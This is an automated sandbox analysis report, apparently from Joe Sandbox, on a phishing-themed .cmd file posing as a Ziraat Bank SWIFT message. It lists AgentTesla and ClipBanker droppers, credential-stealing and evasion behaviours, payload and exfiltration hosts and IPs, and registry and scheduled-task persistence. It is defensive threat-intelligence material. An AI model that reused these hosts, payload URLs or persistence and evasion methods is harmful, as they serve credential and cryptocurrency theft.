OVHFR France 53->109 111 api.ipify.org 104.26.12.205, 443, 49706, 49755 CLOUDFLARENETUS United States 53->111 131 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 53->131 133 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 53->133 135 Tries to steal Mail credentials (via file / registry access) 53->135 91 C:\Users\Public\alpha.pif, PE32 56->91 dropped 137 Drops PE files to the user root directory 56->137 139 Drops PE files with a suspicious file extension 56->139 141 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 56->141 file15 signatures16 process17 signatures18 169 Antivirus detection for dropped file 62->169 171 Multi AV Scanner detection for dropped file 62->171 173 Machine Learning detection for dropped file 62->173 175 Loading BitLocker PowerShell Module 65->175 71 conhost.exe 65->71         started        73 WmiPrvSE.exe 65->73         started        75 conhost.exe 67->75         started        77 timeout.exe 67->77         started        79 conhost.exe 69->79         started        process19

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd18%ReversingLabsWin32.Trojan.Malcab
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%AviraHEUR/AGEN.1311721
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
                      C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Wisrysxl.PIF21%ReversingLabsWin32.Trojan.Generic
                      C:\Users\Public\Libraries\lxsyrsiW.pif3%ReversingLabs
                      C:\Users\Public\alpha.pif0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\neworigin.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\server_BTC.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      C:\Users\user\AppData\Local\Temp\x.exe21%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe66%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://gxe0.com/yak/233_Wisrysx0%Avira URL Cloudsafe
                      http://yadelphi.ruopen0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_WisrysxlfssC0%Avira URL Cloudsafe
                      http://s82.gocheapweb.com0%Avira URL Cloudsafe
                      https://gxe0.com/0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfssexell0%Avira URL Cloudsafe
                      http://yadelphi.ru0%Avira URL Cloudsafe
                      https://gxe0.com/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      https://gxe0.com:443/yak/233_Wisrysxlfss0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      gxe0.com
                      198.252.105.91
                      truefalse
                        high
                        api.ipify.org
                        104.26.12.205
                        truefalse
                          high
                          s82.gocheapweb.com
                          51.195.88.199
                          truefalse
                            high
                            pywolwnvd.biz
                            54.244.188.177
                            truefalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://api.ipify.org/false
                                high
                                https://gxe0.com/yak/233_Wisrysxlfsstrue
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://gxe0.com/yak/233_Wisrysxx.exe, 00000004.00000002.2220018454.00000000208FD000.00000004.00001000.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://sectigo.com/CPS0x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://account.dyn.com/neworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmpfalse
                                        high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.sectigo.com0x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://r11.o.lencr.org0#neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://yadelphi.ruopenx.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://gxe0.com/yak/233_WisrysxlfssCx.exe, 00000004.00000002.2176035692.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.ipify.org/tneworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://gxe0.com/x.exe, 00000004.00000002.2176035692.00000000008FB000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://r11.i.lencr.org/0neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://gxe0.com/yak/233_Wisrysxlfssexellx.exe, 00000004.00000002.2176035692.00000000008D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://api.ipify.orgneworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.c.lencr.org/0neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.i.lencr.org/0neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://contoso.com/powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://s82.gocheapweb.comneworigin.exe, 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://gxe0.com:443/yak/233_Wisrysxlfssx.exe, 00000004.00000002.2176035692.0000000000903000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://yadelphi.rux.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameneworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.pmail.comx.exe, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.0000000002985000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.0000000002990000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020874000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2234539521.0000000021C30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2253826982.000000007FCEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.000000000095A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2235162223.0000000021E2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000A.00000000.2172730384.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000018.00000002.2312849494.0000000002BD2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000000.2295133769.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001C.00000002.2394647640.0000000002A62000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000000.2376277495.0000000000416000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                    high
                                                                                    http://ocsp.sectigo.com0Cx.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.26.12.205
                                                                                      api.ipify.orgUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      198.252.105.91
                                                                                      gxe0.comCanada
                                                                                      20068HAWKHOSTCAfalse
                                                                                      51.195.88.199
                                                                                      s82.gocheapweb.comFrance
                                                                                      16276OVHFRfalse
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1555251
                                                                                      Start date and time:2024-11-13 16:27:07 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 13m 23s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:34
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
                                                                                      Detection:MAL
                                                                                      Classification:mal100.spre.troj.spyw.evad.winCMD@52/25@5/3
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 98%
                                                                                      • Number of executed functions: 277
                                                                                      • Number of non-executed functions: 52
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .cmd
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target TrojanAIbot.exe, PID 2164 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5792 because it is empty
                                                                                      • Execution Graph export aborted for target server_BTC.exe, PID 2820 because it is empty
                                                                                      • Execution Graph export aborted for target server_BTC.exe, PID 7580 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
                                                                                      TimeTypeDescription
                                                                                      10:28:00API Interceptor2x Sleep call for process: x.exe modified
                                                                                      10:28:16API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                      10:28:16API Interceptor7581300x Sleep call for process: neworigin.exe modified
                                                                                      10:28:18API Interceptor3477293x Sleep call for process: TrojanAIbot.exe modified
                                                                                      10:28:22API Interceptor2x Sleep call for process: Wisrysxl.PIF modified
                                                                                      16:28:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                      16:28:16Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                      16:28:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
                                                                                      16:28:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                      • api.ipify.org/
                                                                                      Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                      • api.ipify.org/
                                                                                      perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                      • api.ipify.org/
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      198.252.105.91DHL-INVOICE-MBV.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      • www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
                                                                                      51.195.88.199x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        neworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                            Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                                New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                  AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                    New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                                      RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          s82.gocheapweb.comx.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          neworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 51.195.88.199
                                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          New_Order_PO_GM5637H93.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLine, XWormBrowse
                                                                                                          • 51.195.88.199
                                                                                                          New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          • 51.195.88.199
                                                                                                          AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                                          • 51.195.88.199
                                                                                                          RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                          • 51.195.88.199
                                                                                                          api.ipify.orgPayload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Payload.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://www.canva.com/design/DAGOCNo1NUI/fm7sxEzJIeZ3v2miLpNZCw/view?utm_content=DAGOCNo1NUI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          setup7.0.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                          • 104.26.13.205
                                                                                                          DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
